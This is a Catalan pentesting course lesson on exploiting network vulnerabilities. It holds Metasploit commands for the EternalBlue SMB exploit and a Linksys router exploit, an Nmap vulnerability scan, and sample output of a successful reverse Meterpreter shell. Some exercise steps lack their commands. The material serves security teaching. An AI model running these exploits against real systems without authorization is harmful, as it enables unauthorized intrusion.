Introducció
L'explotació de vulnerabilitats de xarxa és una fase crítica en el procés de pentesting. Aquesta etapa implica identificar i aprofitar les vulnerabilitats en la infraestructura de xarxa per obtenir accés no autoritzat, escalar privilegis o comprometre sistemes i dades. En aquest tema, explorarem les tècniques i eines utilitzades per explotar vulnerabilitats de xarxa.
Conceptes Clau
- Vulnerabilitats de Xarxa: Punts febles en la configuració, implementació o manteniment de la infraestructura de xarxa que poden ser explotats per atacants.
- Explotació Remota: Aprofitar vulnerabilitats des d'una ubicació remota sense accés físic a la xarxa.
- Explotació Local: Aprofitar vulnerabilitats des de dins de la xarxa, sovint després d'haver obtingut accés inicial.
- Eines d'Explotació: Programari utilitzat per identificar i explotar vulnerabilitats de xarxa.
Tècniques d'Explotació de Xarxa
- Explotació de Protocols de Xarxa
a. Protocols Insegurs
Molts protocols de xarxa, com Telnet, FTP i SNMP, poden ser insegurs si no es configuren correctament. Els atacants poden interceptar i manipular el trànsit de xarxa per obtenir credencials o injectar comandes malicioses.
b. Sniffing de Paquets
El sniffing de paquets implica capturar i analitzar el trànsit de xarxa per identificar informació sensible, com credencials d'usuari o dades no xifrades.
- Explotació de Serveis de Xarxa
a. Escaneig de Vulnerabilitats
Utilitzar eines com Nmap per identificar serveis vulnerables en la xarxa.
# Exemple d'escaneig amb Nmap per identificar serveis vulnerables nmap -sV --script vuln <IP-OBJECTIU>
b. Explotació de Serveis
Utilitzar exploits coneguts per comprometre serveis vulnerables. Metasploit és una eina popular per aquest propòsit.
# Exemple d'ús de Metasploit per explotar un servei vulnerable msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOST <IP-OBJECTIU> run
- Explotació de Dispositius de Xarxa
a. Routers i Switches
Els routers i switches poden tenir vulnerabilitats en el seu firmware o configuració que poden ser explotades per obtenir accés a la xarxa.
b. Explotació de Firmware
Actualitzar el firmware amb versions vulnerables o utilitzar exploits específics per comprometre dispositius de xarxa.
# Exemple d'ús de Metasploit per explotar un router msfconsole use exploit/linux/http/linksys_themoon_exec set RHOST <IP-OBJECTIU> run
Eines d'Explotació de Xarxa
Eina | Descripció | Ús Principal |
---|---|---|
Nmap | Eina d'escaneig de xarxa per identificar hosts i serveis actius. | Escaneig de vulnerabilitats |
Wireshark | Analitzador de paquets de xarxa per capturar i analitzar trànsit. | Sniffing de paquets |
Metasploit | Plataforma per desenvolupar, provar i utilitzar exploits. | Explotació de serveis i dispositius |
Nessus | Escàner de vulnerabilitats per identificar problemes de seguretat. | Escaneig de vulnerabilitats |
Exercicis Pràctics
Exercici 1: Escaneig de Vulnerabilitats amb Nmap
- Escaneja una IP objectiu per identificar serveis vulnerables.
- Utilitza el següent comandament:
- Analitza els resultats i identifica possibles vulnerabilitats.
Exercici 2: Explotació d'un Servei Vulnerable amb Metasploit
- Inicia Metasploit i selecciona un exploit per a un servei vulnerable.
- Configura els paràmetres necessaris (RHOST, RPORT, etc.).
- Executa l'exploit i comprova si has aconseguit comprometre el servei.
Solucions als Exercicis
Solució a l'Exercici 1
- Executa l'escaneig amb Nmap:
- Revisa els resultats per identificar serveis vulnerables. Per exemple, podries veure alguna cosa com:
PORT STATE SERVICE VERSION 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 |_smb-vuln-ms17-010: Vulnerable
Solució a l'Exercici 2
- Inicia Metasploit i selecciona l'exploit:
- Configura els paràmetres:
- Executa l'exploit:
- Si l'explotació és exitosa, veuràs una sessió oberta:
[*] Started reverse TCP handler on 192.168.1.100:4444 [*] 192.168.1.101:445 - Connecting to target for exploitation. [*] 192.168.1.101:445 - Sending all but last fragment of exploit packet [*] 192.168.1.101:445 - Sending SMB Echo request [*] 192.168.1.101:445 - Receiving response from exploit packet [*] 192.168.1.101:445 - Sending final SMB Echo request [*] 192.168.1.101:445 - Receiving final SMB Echo response [*] 192.168.1.101:445 - Sending last fragment of exploit packet [*] 192.168.1.101:445 - Receiving response from last exploit packet [*] 192.168.1.101:445 - Sending egg to corrupted connection. [*] 192.168.1.101:445 - Triggering free of corrupted buffer. [*] Sending stage (179267 bytes) to 192.168.1.101 [*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:49158) at 2023-10-10 10:00:00 +0000
Conclusió
L'explotació de vulnerabilitats de xarxa és una habilitat essencial per a qualsevol pentester. Comprendre les tècniques i eines disponibles permet identificar i aprofitar les vulnerabilitats en la infraestructura de xarxa, ajudant a millorar la seguretat global dels sistemes. En el proper mòdul, explorarem l'explotació de vulnerabilitats de sistemes, aprofundint en tècniques específiques per comprometre sistemes operatius i aplicacions.
Curs de Pentesting: Tècniques de Proves de Penetració
Mòdul 1: Introducció al Pentesting
Mòdul 2: Reconeixement i Recollida d'Informació
Mòdul 3: Escaneig i Enumeració
Mòdul 4: Explotació de Vulnerabilitats
- Introducció a l'Explotació
- Explotació de Vulnerabilitats Web
- Explotació de Vulnerabilitats de Xarxa
- Explotació de Vulnerabilitats de Sistemes